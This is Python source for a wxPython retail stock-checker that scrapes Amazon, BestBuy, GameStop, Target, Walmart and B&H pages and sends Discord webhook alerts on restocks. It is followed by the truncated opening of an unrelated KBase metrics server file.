        self.whBtn.Bind( wx.EVT_BUTTON, self.OnManageWebhooks )
        self.addBtn.Bind( wx.EVT_BUTTON, self.AddURLs )
        self.editBtn.Bind( wx.EVT_BUTTON, self.OnChangeWebhook )
        self.delBtn.Bind( wx.EVT_BUTTON, self.DeleteURL )
        self.strtAllBtn.Bind( wx.EVT_BUTTON, self.OnRunAll )
        self.app2Btn.Bind( wx.EVT_BUTTON, self.StopAll )
        self.Bind( wx.EVT_MENU, self.OnClose, id = self.exitItem.GetId() )

    def __del__( self ):
        pass

    def CheckURLs(self, event):
        # For checked rows: start jobs for inactive ones. For unchecked rows:
        # flag running jobs to stop. RunJob is defined elsewhere in the file.
        num = ex.list.GetItemCount()
        for i in range(num):
            if ex.list.IsChecked(i):
                if ex.list.GetItemText(i, col=2) == "Inactive":
                    url = ex.list.GetItemText(i, col=0)
                    hook = ex.list.GetItemText(i, col=1)
                    RunJob(url, hook, i)
            else:
                if ex.list.GetItemText(i, col=2) != "Inactive":
                    ex.list.SetItem(i, 2, "Stopping")
                    colour = wx.Colour(255, 0, 0, 255)
                    ex.list.SetItemTextColour(i, colour)

    def RunAll(self, event):
        # Start a job for every inactive row.
        num = ex.list.GetItemCount()
        for i in range(num):
            if ex.list.GetItemText(i, col=2) == "Inactive":
                url = ex.list.GetItemText(i, col=0)
                hook = ex.list.GetItemText(i, col=1)
                RunJob(url, hook, i)

    def StopAll(self, event):
        # Flag every running row as "Stopping" and turn its text red.
        num = ex.list.GetItemCount()
        for i in range(num):
            if ex.list.GetItemText(i, col=2) != "Inactive":
                ex.list.SetItem(i, 2, "Stopping")
                colour = wx.Colour(255, 0, 0, 255)
                ex.list.SetItemTextColour(i, colour)

    def AddURLs(self, event):
        # Prompt for a product URL; add it to the list and products.json with
        # no webhook and an Inactive status.
        urldict = return_data("./data/products.json")
        product_url = wx.GetTextFromUser('Enter a Product URL', 'Insert dialog')
        product_webhook = "None"
        num = ex.list.GetItemCount()
        idx = (num + 1)
        if product_url != '':
            index = ex.list.InsertItem(idx, product_url)
            ex.list.SetItem(index, 1, "None")
            ex.list.SetItem(index, 2, "Inactive")
            idx += 1
            set_data("./data/products.json", product_url, product_webhook)
            urldict = return_data("./data/products.json")

    def DeleteURL(self, event):
        # Remove the focused row from the list and from products.json.
        urldict = return_data("./data/products.json")
        selected = ex.list.GetFocusedItem()
        text = ex.list.GetItemText(selected, col=0)
        if selected != -1:
            ex.list.DeleteItem(selected)
            del urldict[text]
            with open("./data/products.json", "w") as file:
                json.dump(urldict, file)
                file.close()
            urldict = return_data("./data/products.json")

    def OnChangeWebhook(self, e):
        # Open the modal webhook-assignment dialog for the focused row.
        webhook_dict = return_data("./data/webhooks.json")
        selected = ex.list.GetFocusedItem()
        if selected != -1:
            whDialog = WebhookDialog(None)
            whDialog.ShowModal()
            whDialog.Destroy()

    def OnManageWebhooks(self, e):
        # Refresh the global name list and open the webhook manager frame.
        webhook_dict = return_data("./data/webhooks.json")
        global webhookListChoices
        webhookListChoices = []
        for k in webhook_dict:
            webhookListChoices.append(k)
        whManager = WebhookManager(None)
        whManager.Show()

    def OnClose(self, e):
        self.Destroy()

    def OnSelectAll(self, event):
        # Tick every row's checkbox.
        num = self.list.GetItemCount()
        for i in range(num):
            self.list.CheckItem(i)

    def OnDeselectAll(self, event):
        # Untick every row's checkbox.
        num = self.list.GetItemCount()
        for i in range(num):
            self.list.CheckItem(i, False)

    def OnApply(self, event):
        # Run CheckURLs off the UI thread so the window stays responsive.
        ex.log.AppendText("Processing Selections..." + '\n')
        t = Thread(target=self.CheckURLs, args=(self,))
        t.start()

    def OnRunAll(self, event):
        # Mark every product out-of-stock, then start all jobs off-thread.
        for url in urldict:
            stockdict.update({url: 'False'})
        ex.log.AppendText("Processing Selections..." + '\n')
        t = Thread(target=self.RunAll, args=(self,))
        t.start()
###########################################################################
## Custom init
###########################################################################
def return_data(path):
    """Load and return the JSON document stored at *path*."""
    with open(path, "r") as fp:
        return json.load(fp)
def write_data(path, data):
    """Serialize *data* as JSON, overwriting the file at *path*."""
    with open(path, "w") as fp:
        json.dump(data, fp)
def set_data(path, val1, val2):
    """Upsert one key/value pair (*val1* -> *val2*) in the JSON file at *path*.

    Read-modify-write: loads the whole document, updates it, writes it back.
    """
    document = return_data(path)
    document[val1] = val2
    write_data(path, document)
class Amazon:
    """Check an Amazon offer-listing page and fire a Discord webhook on stock.

    NOTE(review): all of the work happens in __init__; the instance only
    retains url/hook. Relies on module globals webhook_dict, stockdict and
    ex (the GUI instance).
    """

    def __init__(self, url, hook):
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        # Headless Chrome with a desktop user agent to reduce bot detection.
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-logging'])
        options.add_argument('log-level=3')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
        options.add_argument("headless")
        driver = webdriver.Chrome(executable_path=driver_path, options=options)
        driver.get(url)
        html = driver.page_source
        if "To discuss automated access to Amazon data please contact api-services-support@amazon.com." in html:
            # Amazon served its bot-block page instead of the offer list.
            print("Amazon's Bot Protection is preventing this call.")
            ex.log.AppendText("Amazon's Bot Protection prevented a refresh." + '\n')
        else:
            # Scrape availability text, product title and thumbnail image.
            status_raw = driver.find_element_by_xpath("//div[@id='olpOfferList']")
            status_text = status_raw.text
            title_raw = driver.find_element_by_xpath("//h1[@class='a-size-large a-spacing-none']")
            title_text = title_raw.text
            title = title_text
            img_raw = driver.find_element_by_xpath("//div[@id='olpProductImage']//img")
            img = img_raw.get_attribute('src')
            now = datetime.now()
            current_time = now.strftime("%H:%M:%S")
            if "Currently, there are no sellers that can deliver this item to your location." not in status_text:
                print("[" + current_time + "] " + "In Stock: (Amazon.com) " + title + " - " + url)
                # Discord webhook payload (Discord accepts this Slack-style body).
                slack_data = {
                    'username': "Amazon Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/amazon.png",
                    'content': "Amazon Stock Alert:",
                    'embeds': [{
                        'title': title,
                        'description': title + " in stock on Amazon",
                        'url': url,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Status:",
                                "value": "In Stock"
                            }
                        ],
                        'thumbnail': {
                            'url': img
                        }
                    }]
                }
                ex.log.AppendText("[" + current_time + "] " + title + " in stock at Amazon - " + url + '\n')
                # Only notify on a False -> True stock transition to avoid spam.
                if stockdict.get(url) == 'False':
                    response = requests.post(
                        webhook_url, data=json.dumps(slack_data),
                        headers={'Content-Type': 'application/json'})
                    stockdict.update({url: 'True'})
            else:
                print("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title)
                #ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title + '\n')
                stockdict.update({url: 'False'})
        driver.quit()
class BH:
    """Check a B&H Photo product page and fire a Discord webhook on stock.

    Stock is inferred from the literal "Add to Cart" appearing in the page
    HTML. Relies on module globals webhook_dict, stockdict and ex.
    """

    def __init__(self, url, hook):
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        page = requests.get(url)
        # Thumbnail scraping was abandoned; a placeholder image is used below.
        #tree = html.fromstring(page.content)
        #imgs = tree.xpath("//a[contains(@class,'wrapper')]")
        #img_raw = {imgs[0].attrib}
        #img = img_raw.__getattribute__(href)
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        if page.status_code == 200:
            if "Add to Cart" in page.text:
                print("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url)
                # Discord webhook payload (Discord accepts this Slack-style body).
                slack_data = {
                    'username': "BH Photo Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bhphoto.png",
                    'content': "BH Photo Stock Alert: " + url,
                    'embeds': [{
                        'title': url,
                        'description': url + " in stock at BH Photo",
                        'url': url,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Status:",
                                "value": "In Stock"
                            }
                        ],
                        'thumbnail': {
                            'url': "https://wiki.tripwireinteractive.com/images/4/47/Placeholder.png"
                        }
                    }]
                }
                ex.log.AppendText("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url + '\n')
                # Only notify on a False -> True stock transition to avoid spam.
                if stockdict.get(url) == 'False':
                    response = requests.post(
                        webhook_url, data=json.dumps(slack_data),
                        headers={'Content-Type': 'application/json'})
                    stockdict.update({url: 'True'})
            else:
                print("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url)
                #ex.log.AppendText("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url + '\n')
                stockdict.update({url: 'False'})
class BestBuy:
    """One stock check for a BestBuy SKU via the "button state" API.

    Instantiating the class performs the check immediately.

    Args (via __init__):
        sku: BestBuy SKU id string parsed from the product URL.
        orig_url: the original product-page URL; used as the key into the
            shared ``stockdict`` state (this is the key ``main()`` seeds).
        hook: name of the webhook destination in ``webhook_dict``.
    """

    def __init__(self, sku, orig_url, hook):
        self.sku = sku
        self.hook = hook
        webhook_url = webhook_dict[hook]
        # Undocumented BestBuy endpoint reporting the add-to-cart button
        # state for a SKU without rendering the full product page.
        url = "https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C" + sku + "%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get"
        headers2 = {
            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-encoding": "gzip, deflate, br",
            "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
            "cache-control": "max-age=0",
            "upgrade-insecure-requests": "1",
            "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
        }
        page = requests.get(url, headers=headers2)
        link = "https://www.bestbuy.com/site/" + sku + ".p?skuId=" + sku
        al = page.text
        search_string = '"skuId":"' + sku + '","buttonState":"'
        # Offset by the search string's own length instead of the previous
        # hard-coded "+ 33", which silently assumed a 7-digit SKU.
        stock_status = al[al.find(search_string) + len(search_string):
                          al.find('","displayText"')]
        product_name = sku_dict.get(sku)
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        if stock_status == "SOLD_OUT":
            print("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name)
            # Key the shared state on orig_url (not sku) so the in-stock
            # branch below sees the transition and can re-alert after a
            # restock; previously the sold-out branches wrote an orphan
            # sku-keyed entry that the in-stock check never read.
            stockdict.update({orig_url: 'False'})
        elif stock_status == "CHECK_STORES":
            print(product_name + " sold out @ BestBuy (check stores status)")
            stockdict.update({orig_url: 'False'})
        else:
            if stock_status == "ADD_TO_CART":
                print("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link)
                ex.log.AppendText("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link + '\n')
                slack_data = {
                    'username': "BestBuy Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bestbuy.png",
                    'content': "BestBuy Stock Alert:",
                    'embeds': [{
                        'title': product_name,
                        'description': product_name + " in stock at BestBuy",
                        'url': link,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Status:",
                                "value": "In Stock"
                            }
                        ],
                        'thumbnail': {
                            'url': bbimgdict.get(sku)
                        }
                    }]
                }
                # Alert only on the out-of-stock -> in-stock edge.
                if stockdict.get(orig_url) == 'False':
                    response = requests.post(
                        webhook_url, data=json.dumps(slack_data),
                        headers={'Content-Type': 'application/json'})
                    stockdict.update({orig_url: 'True'})
class Gamestop:
    """One stock check for a gamestop.com product page via Selenium.

    Instantiating the class performs the check immediately: a headless
    Chrome session scrapes the add-to-cart button, title and image, and a
    webhook alert fires on the out-of-stock -> in-stock transition tracked
    in the shared ``stockdict``.
    """

    def __init__(self, url, hook):
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-logging'])
        options.add_argument('log-level=3')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"')
        options.add_argument("headless")
        # 'chrome_options=' is deprecated in Selenium; pass 'options=' as
        # the Amazon checker in this file already does.
        driver = webdriver.Chrome(executable_path=driver_path, options=options)
        try:
            driver.get(url)
            status_raw = driver.find_element_by_xpath("//div[@class='add-to-cart-buttons']")
            status_text = status_raw.text
            title_raw = driver.find_element_by_xpath("//h1[@class='product-name h2']")
            title = title_raw.text
            image_raw = driver.find_element_by_xpath("//img[@class='mainImg ae-img']")
            img = image_raw.get_attribute('src')
            now = datetime.now()
            current_time = now.strftime("%H:%M:%S")
            if "ADD TO CART" in status_text:
                print("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url)
                ex.log.AppendText("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url + '\n')
                slack_data = {
                    'username': "GameStop Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/gamestop.png",
                    'content': "GameStop Stock Alert:",
                    'embeds': [{
                        'title': title,
                        'description': title + " in stock at GameStop",
                        'url': url,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Status:",
                                "value": "In Stock"
                            }
                        ],
                        'thumbnail': {
                            'url': img
                        }
                    }]
                }
                # Alert only on the out-of-stock -> in-stock edge.
                if stockdict.get(url) == 'False':
                    response = requests.post(
                        webhook_url, data=json.dumps(slack_data),
                        headers={'Content-Type': 'application/json'})
                    stockdict.update({url: 'True'})
            else:
                print("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title)
                stockdict.update({url: 'False'})
        finally:
            # Always close the browser, even when scraping raises, so
            # failed checks don't leak headless Chrome processes.
            driver.quit()
class Target:
    """One stock check for a target.com product page.

    Instantiating the class performs the check immediately: the
    availability status is sliced out of the JSON embedded in the page
    source, and a webhook alert fires on the out-of-stock -> in-stock
    transition tracked in the shared ``stockdict``.
    """

    def __init__(self, url, hook):
        self.url = url
        self.hook = hook
        destination = webhook_dict[hook]
        page = requests.get(url)
        body = page.text
        doc = html.fromstring(page.content)
        first_imgs = doc.xpath("//img[1]")
        # Slice the image URL out of the first <img> tag's attribute repr.
        img = str(first_imgs[0].attrib)[20:-2]
        # Product title comes from the embedded twitter-card metadata.
        title = body[body.find('"twitter":{"title":') + 20 : body.find('","card')]
        timestamp = datetime.now().strftime("%H:%M:%S")
        status = body[body.find('"availability_status":"') + 23 : body.find('","multichannel_options"')]
        if status == "OUT_OF_STOCK":
            print("[" + timestamp + "] " + "Sold Out: (Target.com) " + title)
            stockdict.update({url: 'False'})
        elif status == "IN_STOCK":
            print("[" + timestamp + "] " + "In Stock: (Target.com) " + title + " - " + url)
            ex.log.AppendText("[" + timestamp + "] " + "In Stock: (Target.com) " + title + " - " + url + '\n')
            alert = {
                'username': "Target Bot",
                'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/target.png",
                'content': "Target Stock Alert:",
                'embeds': [{
                    'title': title,
                    'description': title + " in stock at Target",
                    'url': url,
                    "fields": [
                        {"name": "Time:", "value": timestamp},
                        {"name": "Status:", "value": "In Stock"},
                    ],
                    'thumbnail': {'url': img},
                }],
            }
            # Alert only on the out-of-stock -> in-stock edge.
            if stockdict.get(url) == 'False':
                requests.post(
                    destination, data=json.dumps(alert),
                    headers={'Content-Type': 'application/json'})
                stockdict.update({url: 'True'})
        else:
            print("[" + timestamp + "] " + "UNKNOWN STATUS: (Target.com) " + title + " for status of: " + status)
class Walmart:
    """One stock check for a walmart.com product page.

    Instantiating the class performs the check immediately: scrape title,
    price and image, then alert the configured webhook on an out-of-stock
    -> in-stock transition, optionally suppressed when the price exceeds
    the global ``maxprice``.
    """

    def __init__(self, url, hook):
        self.url = url
        self.hook = hook
        webhook_url = webhook_dict[hook]
        page = requests.get(url)
        tree = html.fromstring(page.content)
        title_raw = tree.xpath("//h1[starts-with(@class, 'prod-ProductTitle')]")
        title = title_raw[0].text
        price_raw = tree.xpath("//span[starts-with(@class, 'price display-inline-block')]//span")
        price = price_raw[0].text
        img_raw = tree.xpath("//meta[@property='og:image']/@content")
        img = img_raw[0]
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S")
        if page.status_code == 200:
            if "Add to cart" in page.text:
                print("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url)
                ex.log.AppendText("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url + '\n')
                slack_data = {
                    'username': "Walmart Bot",
                    'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/walmart.png",
                    'content': "Walmart Stock Alert:",
                    'embeds': [{
                        'title': title,
                        'description': title + " in stock at Walmart for $" + price,
                        'url': url,
                        "fields": [
                            {
                                "name": "Time:",
                                "value": current_time
                            },
                            {
                                "name": "Price:",
                                "value": "$" + price
                            }
                        ],
                        'thumbnail': {
                            'url': img
                        }
                    }]
                }
                if stockdict.get(url) == 'False':
                    if maxprice != 0:
                        # float() instead of int(): Walmart prices are
                        # decimal strings like "299.99", which int() rejects
                        # with a ValueError.
                        if float(price) > maxprice:
                            print("in stock but not MSRP")
                        else:
                            try:
                                response = requests.post(
                                    webhook_url, data=json.dumps(slack_data),
                                    headers={'Content-Type': 'application/json'})
                            except Exception:
                                print("Webhook sending failed. Invalid URL configured.")
                    else:
                        try:
                            response = requests.post(
                                webhook_url, data=json.dumps(slack_data),
                            headers={'Content-Type': 'application/json'})
                        except Exception:
                            print("Webhook sending failed. Invalid URL configured.")
                    # NOTE(review): marked 'True' even when the price gate
                    # suppressed the alert, so a later price drop will not
                    # re-alert — preserved from the original behavior.
                    stockdict.update({url: 'True'})
            else:
                print("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title)
                stockdict.update({url: 'False'})
def write_log(string):
    """Append *string* (plus a newline) to the GUI log widget.

    Falls back to printing on stdout when the GUI is unavailable — worker
    threads may log before the GUI exists or after it is destroyed.
    """
    try:
        ex.log.AppendText(string + '\n')
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # still propagate out of a logging call.
        print("Failed to output to log - Message: \n " + string)
def amzfunc(url, hook, i):
    """Background loop: poll Amazon every 10s while GUI row *i* is Active."""
    print("Thread started -> " + url)
    while True:
        try:
            if ex.list.GetItemText(i, col=2) != "Active":
                # Row was deactivated from the GUI: restore its colour,
                # mark it Inactive, and stop polling.
                print("Aborted Thread")
                ex.list.SetItemTextColour(i, wx.Colour(0, 0, 0, 255))
                ex.list.SetItem(i, 2, "Inactive")
                break
            try:
                Amazon(url, hook)
            except:
                print("Some error ocurred parsing Amazon")
                write_log("An error ocurred parsing Amazon")
            time.sleep(10)
        except:
            # GUI gone (e.g. window closed): end the thread quietly.
            break
def bestbuyfunc(sku, orig_url, hook, i):
    """Background loop: poll BestBuy every 10s while GUI row *i* is Active."""
    print("Thread started -> " + sku)
    while True:
        try:
            if ex.list.GetItemText(i, col=2) != "Active":
                # Row was deactivated from the GUI: restore its colour,
                # mark it Inactive, and stop polling.
                print("Aborted Thread")
                ex.list.SetItemTextColour(i, wx.Colour(0, 0, 0, 255))
                ex.list.SetItem(i, 2, "Inactive")
                break
            try:
                BestBuy(sku, orig_url, hook)
            except:
                print("Some error ocurred parsing BestBuy")
                write_log("An error ocurred parsing BestBuy")
            time.sleep(10)
        except:
            # GUI gone (e.g. window closed): end the thread quietly.
            break
def gamestopfunc(url, hook, i):
    """Background loop: poll GameStop every 10s while GUI row *i* is Active."""
    print("Thread started -> " + url)
    while True:
        try:
            if ex.list.GetItemText(i, col=2) != "Active":
                # Row was deactivated from the GUI: restore its colour,
                # mark it Inactive, and stop polling.
                print("Aborted Thread")
                ex.list.SetItemTextColour(i, wx.Colour(0, 0, 0, 255))
                ex.list.SetItem(i, 2, "Inactive")
                break
            try:
                Gamestop(url, hook)
            except:
                print("Some error ocurred parsing Gamestop")
                write_log("An error ocurred parsing Gamestop")
            time.sleep(10)
        except:
            # GUI gone (e.g. window closed): end the thread quietly.
            break
def targetfunc(url, hook, i):
    """Background loop: poll Target every 10s while GUI row *i* is Active."""
    print("Thread started -> " + url)
    while True:
        try:
            if ex.list.GetItemText(i, col=2) != "Active":
                # Row was deactivated from the GUI: restore its colour,
                # mark it Inactive, and stop polling.
                print("Aborted Thread")
                ex.list.SetItemTextColour(i, wx.Colour(0, 0, 0, 255))
                ex.list.SetItem(i, 2, "Inactive")
                break
            try:
                Target(url, hook)
            except:
                print("Some error ocurred parsing Target")
                write_log("An error ocurred parsing Target")
            time.sleep(10)
        except:
            # GUI gone (e.g. window closed): end the thread quietly.
            break
def walmartfunc(url, hook, i):
    """Background loop: poll Walmart every 10s while GUI row *i* is Active."""
    print("Thread started -> " + url)
    while True:
        try:
            if ex.list.GetItemText(i, col=2) != "Active":
                # Row was deactivated from the GUI: restore its colour,
                # mark it Inactive, and stop polling.
                print("Aborted Thread")
                ex.list.SetItemTextColour(i, wx.Colour(0, 0, 0, 255))
                ex.list.SetItem(i, 2, "Inactive")
                break
            try:
                # Re-read the webhook column each pass so GUI edits take
                # effect without restarting the thread.
                hook = ex.list.GetItemText(i, col=1)
                Walmart(url, hook)
            except:
                print("Some error ocurred parsing WalMart")
                write_log("An error ocurred parsing Walmart")
            time.sleep(10)
        except:
            # GUI gone (e.g. window closed): end the thread quietly.
            break
def bhfunc(url, hook, i):
    """Background loop: poll B&H Photo every 10s while GUI row *i* is Active."""
    print("Thread started -> " + url)
    while True:
        try:
            if ex.list.GetItemText(i, col=2) != "Active":
                # Row was deactivated from the GUI: restore its colour,
                # mark it Inactive, and stop polling.
                print("Aborted Thread")
                ex.list.SetItemTextColour(i, wx.Colour(0, 0, 0, 255))
                ex.list.SetItem(i, 2, "Inactive")
                break
            try:
                # Re-read the webhook column each pass so GUI edits take
                # effect without restarting the thread.
                hook = ex.list.GetItemText(i, col=1)
                BH(url, hook)
            except:
                print("Some error ocurred parsing BH Photo")
                write_log("An error ocurred parsing BH Photo")
            time.sleep(10)
        except:
            # GUI gone (e.g. window closed): end the thread quietly.
            break
def RunJob(url, hook, i):
    """Dispatch a monitor thread for *url* based on its retailer domain.

    Marks GUI list row *i* as Active (green) and spawns the matching
    retailer polling loop in a new Thread.  ``hook`` names the webhook
    destination passed through to the checker.  URLs whose domain matches
    none of the known retailers are silently ignored.
    """
    #Amazon URL Detection
    if "amazon.com" in url:
        try:
            active_status = ex.list.GetItemText(i, col=2)
            # Only the offer-listing page layout is parseable by the
            # Amazon checker.
            if "offer-listing" in url:
                if active_status != "Active":
                    colour = wx.Colour(0, 255, 0, 255)
                    ex.list.SetItemTextColour(i, colour)
                    ex.list.SetItem(i, 2, "Active")
                    print("Amazon URL detected using Webhook destination " + hook)
                    write_log(("Amazon URL detected -> " + hook))
                    t = Thread(target=amzfunc, args=(url, hook, i))
                    t.start()
                    time.sleep(0.5)
            else:
                print("Invalid Amazon link detected. Please use the Offer Listing page.")
        except:
            print("Error processing URL: " + url)
    #Gamestop URL Detection
    elif "gamestop.com" in url:
        try:
            active_status = ex.list.GetItemText(i, col=2)
            if active_status != "Active":
                colour = wx.Colour(0, 255, 0, 255)
                ex.list.SetItemTextColour(i, colour)
                ex.list.SetItem(i, 2, "Active")
                print("Gamestop URL detected using Webhook destination " + hook)
                write_log(("GameStop URL detected -> " + hook))
                t = Thread(target=gamestopfunc, args=(url, hook, i))
                t.start()
                time.sleep(0.5)
        except:
            print("Error processing URL: " + url)
    #BestBuy URL Detection
    elif "bestbuy.com" in url:
        try:
            print("BestBuy URL detected using Webhook destination " + hook)
            #ex.log.AppendText("BestBuy URL detected using Webhook destination " + hook + '\n')
            # Extract the skuId query parameter; the checker polls the SKU
            # via BestBuy's API rather than scraping the page.
            parsed = urlparse.urlparse(url)
            sku = parse_qs(parsed.query)['skuId']
            sku = sku[0]
            bestbuylist.append(sku)
            headers = {
                "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                "accept-encoding": "gzip, deflate, br",
                "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
                "cache-control": "max-age=0",
                "upgrade-insecure-requests": "1",
                "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
            }
            # Fetch the product page once up front to cache the title and
            # thumbnail image for later alert embeds.
            page = requests.get(url, headers=headers)
            al = page.text
            tree = html.fromstring(page.content)
            img = tree.xpath('//img[@class="primary-image"]/@src')[0]
            title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]
            sku_dict.update({sku: title})
            bbdict.update({sku: hook})
            bbimgdict.update({sku: img})
            active_status = ex.list.GetItemText(i, col=2)
            if active_status != "Active":
                colour = wx.Colour(0, 255, 0, 255)
                ex.list.SetItemTextColour(i, colour)
                ex.list.SetItem(i, 2, "Active")
                print("BestBuy URL detected using Webhook destination " + hook)
                write_log(("BestBuy URL detected -> " + hook))
                orig_url = url
                t = Thread(target=bestbuyfunc, args=(sku, orig_url, hook, i))
                t.start()
                time.sleep(0.5)
        except:
            print("Error processing URL: " + url)
    #Target URL Detection
    elif "target.com" in url:
        try:
            #targetlist.append(url)
            active_status = ex.list.GetItemText(i, col=2)
            if active_status != "Active":
                colour = wx.Colour(0, 255, 0, 255)
                ex.list.SetItemTextColour(i, colour)
                ex.list.SetItem(i, 2, "Active")
                print("Target URL detected using Webhook destination " + hook)
                write_log(("Target URL detected -> " + hook))
                t = Thread(target=targetfunc, args=(url, hook, i))
                t.start()
                time.sleep(0.5)
        except:
            print("Error processing URL: " + url)
    #Walmart URL Detection
    elif "walmart.com" in url:
        try:
            #walmartlist.append(url)
            active_status = ex.list.GetItemText(i, col=2)
            if active_status != "Active":
                colour = wx.Colour(0, 255, 0, 255)
                ex.list.SetItemTextColour(i, colour)
                ex.list.SetItem(i, 2, "Active")
                print("Walmart URL detected using Webhook destination " + hook)
                write_log(("Walmart URL detected -> " + hook))
                t = Thread(target=walmartfunc, args=(url, hook, i))
                t.start()
                time.sleep(0.5)
        except:
            print("Error processing URL: " + url)
    #B&H Photo URL Detection
    elif "bhphotovideo.com" in url:
        try:
            active_status = ex.list.GetItemText(i, col=2)
            if active_status != "Active":
                colour = wx.Colour(0, 255, 0, 255)
                ex.list.SetItemTextColour(i, colour)
                ex.list.SetItem(i, 2, "Active")
                print("BH Photo URL detected using Webhook destination " + hook)
                write_log(("BH Photo URL detected -> " + hook))
                t = Thread(target=bhfunc, args=(url, hook, i))
                t.start()
                time.sleep(0.5)
        except:
            print("Error processing URL: " + url)
def main():
    """Build the GUI, load products and webhooks, seed the shared state
    dictionaries, populate the product list, and enter the wx main loop."""
    global ex, stockdict, bestbuylist, bbdict, bbimgdict, sku_dict
    global webhook_dict, urldict
    app = wx.App()
    ex = GUI(None)
    bestbuylist = []
    bbdict = {}
    bbimgdict = {}
    sku_dict = {}
    webhook_dict = return_data("./data/webhooks.json")
    urldict = return_data("./data/products.json")
    #set all URLs to be "out of stock" to begin
    stockdict = {url: 'False' for url in urldict}
    products = [(prod, urldict[prod], "Inactive") for prod in urldict]
    ex.list.InsertColumn(0, 'URL', width=540)
    ex.list.InsertColumn(1, 'Webhook')
    ex.list.SetColumnWidth(col=1, width=100)
    ex.list.InsertColumn(2, 'Status')
    for row, (prod_url, prod_hook, prod_status) in enumerate(products):
        item = ex.list.InsertItem(row, prod_url)
        ex.list.SetItem(item, 1, prod_hook)
        ex.list.SetItem(item, 2, prod_status)
    ex.Show()
    app.MainLoop()
# Launch the GUI application when run as a script.
if __name__ == '__main__':
    main()
kb_MetricsServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_Metrics.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Return the deployment config file path from the environment, or None."""
    return environ.get(DEPLOY)
def get_service_name():
    """Return the service name from the environment, or None when unset."""
    return environ.get(SERVICE)
def get_config():
    """Parse this service's section of the deployment config into a dict.

    Returns None when no config file is configured via the environment.
    Falls back to the 'kb_Metrics' section when no service name is set.
    """
    config_file = get_config_file()
    if not config_file:
        return None
    parser = ConfigParser()
    parser.read(config_file)
    section = get_service_name() or 'kb_Metrics'
